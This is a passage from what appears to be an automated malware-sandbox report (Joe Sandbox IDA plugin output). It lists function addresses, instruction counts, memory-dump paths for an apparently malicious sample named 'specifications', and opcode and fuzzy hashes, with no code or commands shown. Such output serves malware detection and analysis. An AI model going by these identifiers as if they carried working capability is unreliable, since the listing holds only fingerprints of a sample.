                                                                                                                                                                                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                  • Instruction ID: 9fdb68336f4e029476be2308cf32e4c154c884008050fba57c9f8ef2398196b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1241B775B00106ABEB1DDFD9CC94ABFBBBAAF85A54F144069E904A7341D770DD01C760
                                                                                                                                                                                  Function 01080887 Relevance: .1, Instructions: 128COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e4b3db2ab83a3d6bbe8635bda0ec3d55db4dbb5d696b125a06f77dae0773f07b
                                                                                                                                                                                  • Instruction ID: 9afd840b731b73d6ad5a0d71c61dcbf09c236b91eca5f5017b67422c0fc45f13
                                                                                                                                                                                  • Opcode Fuzzy Hash: e4b3db2ab83a3d6bbe8635bda0ec3d55db4dbb5d696b125a06f77dae0773f07b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1641E370604702DFE725EF28C490A26BBF9FF49314B108A6DE5DB87A55E730E849CB90
                                                                                                                                                                                  Function 010AA470 Relevance: .1, Instructions: 127COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 2c3cf79b78f754b38eb50d3618620514704a416db2d81a19adcde7f8390992eb
                                                                                                                                                                                  • Instruction ID: 1c0bec5d6de3c5ef97a4aaecb471d7906c9166e99890f2bb60aecf17eda5bf96
                                                                                                                                                                                  • Opcode Fuzzy Hash: 2c3cf79b78f754b38eb50d3618620514704a416db2d81a19adcde7f8390992eb
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D419E31A45209CFDB25DFACC4547ED7BF0BB58350F4401A9D4A1AB2D1DB349980CBA5
                                                                                                                                                                                  Function 01088BF0 Relevance: .1, Instructions: 124COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cc6dcee1248fe9a2753c6bc3600e407d8955d480c22e1fb9851c4cd890aa4f9d
                                                                                                                                                                                  • Instruction ID: d0aa8a27ae8d0d1efa6ee229de21695e5bc5e7f26b493effcd2d18908288c2b8
                                                                                                                                                                                  • Opcode Fuzzy Hash: cc6dcee1248fe9a2753c6bc3600e407d8955d480c22e1fb9851c4cd890aa4f9d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 51412132904206CFDB28AF5DC880A9EBBF5FB94704F54C02AD9909BB59C735D882CF90
                                                                                                                                                                                  Function 01078918 Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9b5249c650ef5d8002880be0540eadc458cbdcca4b7ba33631e6514538bcc178
                                                                                                                                                                                  • Instruction ID: 5ef89dd400258d819eeff81d3225e3405d5aa91506fd63bb48e450f9fb858c5c
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b5249c650ef5d8002880be0540eadc458cbdcca4b7ba33631e6514538bcc178
                                                                                                                                                                                  • Instruction Fuzzy Hash: AC4159319087069ED312DF688840AABB7E8BF88B54F45492BF9C4D7250E731DE058BA7
                                                                                                                                                                                  Function 0107A020 Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                  • Instruction ID: ab6b045f3613128f319aeb3b7b51925f2ad561a22f8ca262287168a1eaa9032b
                                                                                                                                                                                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                                                                                                                                                                                  • Instruction Fuzzy Hash: D4412731F00311DBEB62DE6984407FEBBA1EB51764F1A84EAF9C58B240D6329D80CBD4
                                                                                                                                                                                  Function 010809AD Relevance: .1, Instructions: 122COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ac608be18374960cce65bbe84647d4e6cbb2fc64f45575dc086a81f48ab2d63d
                                                                                                                                                                                  • Instruction ID: 19bcfe280e30b32c98eaa7fe5f42b0e8b5751d9d76eb4b9265251e207c721a31
                                                                                                                                                                                  • Opcode Fuzzy Hash: ac608be18374960cce65bbe84647d4e6cbb2fc64f45575dc086a81f48ab2d63d
                                                                                                                                                                                  • Instruction Fuzzy Hash: 3D416571604601EFD721EF18C840B6ABBF4EF58314F248A6AE4D98B251E771E946CB90
                                                                                                                                                                                  Function 010B0710 Relevance: .1, Instructions: 121COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                  • Instruction ID: b0c61bb9f1ae7ee18abaf9e591daa6be8fdb7ca1c242097f0327b28850169221
                                                                                                                                                                                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F412571A00605EFDB24CF98C9D0AAEBBF5FF18700B10496DE596D7694D730AA44CF90
                                                                                                                                                                                  Function 0108262C Relevance: .1, Instructions: 119COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f6b68510064871d8f3f7767500711f663fd70a37461825f4a22aea7ea8f4347f
                                                                                                                                                                                  • Instruction ID: 648ee739bf575623eb9ba599886fd25bf2c632f97d75794fb4f5d6e2236ce9cc
                                                                                                                                                                                  • Opcode Fuzzy Hash: f6b68510064871d8f3f7767500711f663fd70a37461825f4a22aea7ea8f4347f
                                                                                                                                                                                  • Instruction Fuzzy Hash: EE41AEB0509B05DFDB65FF29C940A99B7F1FF58314F1082AAC4D69B2A1DB309981CB51
                                                                                                                                                                                  Function 010BC8F9 Relevance: .1, Instructions: 116COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: ea492c80e1405e8b3165f842b05c57c865f51ff4af8757c3d1d062cf95e876c2
                                                                                                                                                                                  • Instruction ID: d48a77e99d8c588a0a224c73acbc8c44b3f123536c29a7ab575b45fd209b52e7
                                                                                                                                                                                  • Opcode Fuzzy Hash: ea492c80e1405e8b3165f842b05c57c865f51ff4af8757c3d1d062cf95e876c2
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0931A9B1A00345DFEB56CFA8C580799BBF0FB09728F2081AED559EB251D7329902CF90
                                                                                                                                                                                  Function 011007C3 Relevance: .1, Instructions: 114COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 8aab121bc3e8ff9941dd0cf33152152872debc7a655b699814a8cb861b53540f
                                                                                                                                                                                  • Instruction ID: d9df52abe7075f6123fb36de268693258a14ae34080eb441c7cd59cbc8fe4bd0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8aab121bc3e8ff9941dd0cf33152152872debc7a655b699814a8cb861b53540f
                                                                                                                                                                                  • Instruction Fuzzy Hash: A9419E719083059FD365DF29C845B9BBBE8FF88764F004A2EF5A8C7291D7709944CB92
                                                                                                                                                                                  Function 010780A0 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 0746e22cf14fee66db91a546c3b603ab0336465f8dccedf1b9fa88540d5c3095
                                                                                                                                                                                  • Instruction ID: 067d49d28163d574530807b60fb4832f284848dae9d3ace1387fe85cd563f5cb
                                                                                                                                                                                  • Opcode Fuzzy Hash: 0746e22cf14fee66db91a546c3b603ab0336465f8dccedf1b9fa88540d5c3095
                                                                                                                                                                                  • Instruction Fuzzy Hash: BF41F071E05616EFCB01DF18D884AACBBB9BF54760F20C26AD895A7280DB30ED41CBD4
                                                                                                                                                                                  Function 011005A7 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 6681215de59e44966639a0ff9d89daa5b807c130a42921be8368e10b59b8453f
                                                                                                                                                                                  • Instruction ID: 8aa6f1aeb55a24096d72b574122ef4a8759b4ff5c12e03cbb1378b19bfcd5dac
                                                                                                                                                                                  • Opcode Fuzzy Hash: 6681215de59e44966639a0ff9d89daa5b807c130a42921be8368e10b59b8453f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5741E372A046469FC325DF68CC50BAAB7E5FFC8740F14462DF9948B680E770E904CBA6
                                                                                                                                                                                  Function 01084859 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: de3167eaa95275f3e8d98e172e724b324791cebe467d68a85e1b8de83864b1d0
                                                                                                                                                                                  • Instruction ID: 654c2a0bed0696a369bd2c16caa5644763b91fdd6c58d641e36901c59fff5018
                                                                                                                                                                                  • Opcode Fuzzy Hash: de3167eaa95275f3e8d98e172e724b324791cebe467d68a85e1b8de83864b1d0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2941BE702083068BDB35EF2CD894B2ABBE9AF80364F1544ADE6D5CB291DB74D851CB91
                                                                                                                                                                                  Function 01078B50 Relevance: .1, Instructions: 111COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: b69d753d1cddbd2157fdc7c3f3e16d1586f495f2615e2b3287e0e8bda166d5cd
                                                                                                                                                                                  • Instruction ID: 085ce25cf4405320150f149d8a37e3ae291f23f2b9de27da5ab94d6a0069be5f
                                                                                                                                                                                  • Opcode Fuzzy Hash: b69d753d1cddbd2157fdc7c3f3e16d1586f495f2615e2b3287e0e8bda166d5cd
                                                                                                                                                                                  • Instruction Fuzzy Hash: F7419DB1E01609CFCB14DF69C9849ADBBF1FF98324B20C66BD4A6A7260DB349941CF44
                                                                                                                                                                                  Function 010902E1 Relevance: .1, Instructions: 106COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                  • Instruction ID: 947887ab229d66f7bf740b5c592d3c8d16fad31f2259e5e9d9f5389796a98961
                                                                                                                                                                                  • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2E31E031A04249AFDF629B69CC44BDEBBEDAF14350F04C1A6F899D7256C7749884CBA0
                                                                                                                                                                                  Function 0112E3DB Relevance: .1, Instructions: 105COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 123189d5d54ab574cae002735d8f4d9fb411eeb0fbb6133f3785daae66bb8143
                                                                                                                                                                                  • Instruction ID: 9d2d5f19b87ae2a77f361b1767be1cc988551390533a28514d99ccb0fe65d8ce
                                                                                                                                                                                  • Opcode Fuzzy Hash: 123189d5d54ab574cae002735d8f4d9fb411eeb0fbb6133f3785daae66bb8143
                                                                                                                                                                                  • Instruction Fuzzy Hash: CD31D931B41756ABDB269F658C90FEF7AB8AB58B50F000028F600EB391DBA5DC00C7E0
                                                                                                                                                                                  Function 01134B4B Relevance: .1, Instructions: 104COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a8c56d6225abfb7df2b4a9405477eb8fe0523386c75c3332fb1ac49bcd504dfc
                                                                                                                                                                                  • Instruction ID: 4e746af6676c54c0930f87288b08e1d5ec747bcca64d6dbca102f4d6ae0aef54
                                                                                                                                                                                  • Opcode Fuzzy Hash: a8c56d6225abfb7df2b4a9405477eb8fe0523386c75c3332fb1ac49bcd504dfc
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9E31E1322056018FD729DF19D890E6ABBF5FBC1320F0A447DE9998BB59D730A844CB91
                                                                                                                                                                                  Function 01084260 Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 074bab067f1426189280999e5d617c2a8a3b96435e2ef5259ec2c73e6a00b36a
                                                                                                                                                                                  • Instruction ID: 3db03d3d63a13d049aef329aa8604dd96be65c1459993aec063eab0e7af10283
                                                                                                                                                                                  • Opcode Fuzzy Hash: 074bab067f1426189280999e5d617c2a8a3b96435e2ef5259ec2c73e6a00b36a
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9041BD71204B46DFD766DF29C884BDA7BE5AB58314F00846DFAD9CB250C7B4E804CB50
                                                                                                                                                                                  Function 01134BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: f33e0c204101bcd099fac529c5a8cc4f5056d3753ad6a3c73d3266916d4015d0
                                                                                                                                                                                  • Instruction ID: 8f05ff5436458180ee8a58dce23d3a82d22b00cd6317569bbd7df261885f7479
                                                                                                                                                                                  • Opcode Fuzzy Hash: f33e0c204101bcd099fac529c5a8cc4f5056d3753ad6a3c73d3266916d4015d0
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8931AF716042019FE728DF29C890A2AB7E5FBC4720F05456DF9A99BB58D730EC44CB91
                                                                                                                                                                                  Function 010FEB1D Relevance: .1, Instructions: 100COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9f6becb9de5a1e60424c4ecf6b0953285b8427c98e9da375e711253ce5bf0463
                                                                                                                                                                                  • Instruction ID: 0a70f7de784948a8dc8166524ee21b3de926dad24b02e67d7ba5dcb20e5c7ca0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f6becb9de5a1e60424c4ecf6b0953285b8427c98e9da375e711253ce5bf0463
                                                                                                                                                                                  • Instruction Fuzzy Hash: AC3106316017CA9BF326976CCD59B567BD8BB45744F1E00E8ABC19BAF2DB28D841C260
                                                                                                                                                                                  Function 011461C3 Relevance: .1, Instructions: 97COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 9f50908da925f802f5fd519fc6a72bdfbf7120af09d5ca447ed41bad65409bb4
                                                                                                                                                                                  • Instruction ID: e662d1fe9150a44f7080cc2430b4ec28dd94349bd6039c5edaa99b3192040a36
                                                                                                                                                                                  • Opcode Fuzzy Hash: 9f50908da925f802f5fd519fc6a72bdfbf7120af09d5ca447ed41bad65409bb4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E31E175A0021ABBDB19DF98CC80FAEB7B5FB49B44F454168E900EB244D770ED40CBA4
                                                                                                                                                                                  Function 0112483A Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: e21896e1210c0a8e29905149f992b271a0df513c992c919f5009a9e732aa0789
                                                                                                                                                                                  • Instruction ID: 30582795ff6cba1f54d8e89eeb3bc0f8f2167cb5e43ebc824e726a47b6adf1eb
                                                                                                                                                                                  • Opcode Fuzzy Hash: e21896e1210c0a8e29905149f992b271a0df513c992c919f5009a9e732aa0789
                                                                                                                                                                                  • Instruction Fuzzy Hash: 2F314176A4012DABCF25DF54DC88BDEBBBAAB9C750F1440A5E508A7250DB30DE91CF90
                                                                                                                                                                                  Function 010AEB20 Relevance: .1, Instructions: 96COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 438f1f14301915180acce1c0c6d51af1f91a51cde1f72783656591f3769f4197
                                                                                                                                                                                  • Instruction ID: 5eb17a0c30cc04f012afef6876da5920ac819c1564260a4906468a1757abb0e4
                                                                                                                                                                                  • Opcode Fuzzy Hash: 438f1f14301915180acce1c0c6d51af1f91a51cde1f72783656591f3769f4197
                                                                                                                                                                                  • Instruction Fuzzy Hash: 7F31C472E10219AFDB21EFA9CC44BAFBBF9EF04750F514465E596D7250D2709E008BA0
                                                                                                                                                                                  Function 011460B8 Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: a6dfd43383be95a09a2032536709c9bb9944e91b7e1acba817ef365bcc056100
                                                                                                                                                                                  • Instruction ID: 8e1bfe04ed1d8603b55aa8f051c4e64413d3b239f3778b0f8f6af2b057adc410
                                                                                                                                                                                  • Opcode Fuzzy Hash: a6dfd43383be95a09a2032536709c9bb9944e91b7e1acba817ef365bcc056100
                                                                                                                                                                                  • Instruction Fuzzy Hash: E631E871640616AFDB1E9F59C850BAEB7B5AF85F58F014069E505DB341DB30DC00CB90
                                                                                                                                                                                  Function 010807AF Relevance: .1, Instructions: 95COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 84b68291dc26acaadef8e1764c3cfb5b46ac29f74504b417275eb1a00506a1a4
                                                                                                                                                                                  • Instruction ID: dbb1a41998e7d5ec8242c80daf886a4daf15c4296922314e13bc79e853ffb116
                                                                                                                                                                                  • Opcode Fuzzy Hash: 84b68291dc26acaadef8e1764c3cfb5b46ac29f74504b417275eb1a00506a1a4
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F31D132A18716DBC712FE28C880AAFBBE5AF94250F014569FDD59B314DB30DC4987E1
                                                                                                                                                                                  Function 01088550 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000002.00000002.2040922349.0000000001050000.00000040.00001000.00020000.00000000.sdmp, Offset: 01050000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_1050000_specifications.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID:
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                  • Opcode ID: 79b0bcc6f1858f844a142b3a1d333635235f93822129675d9808e56ea9739790
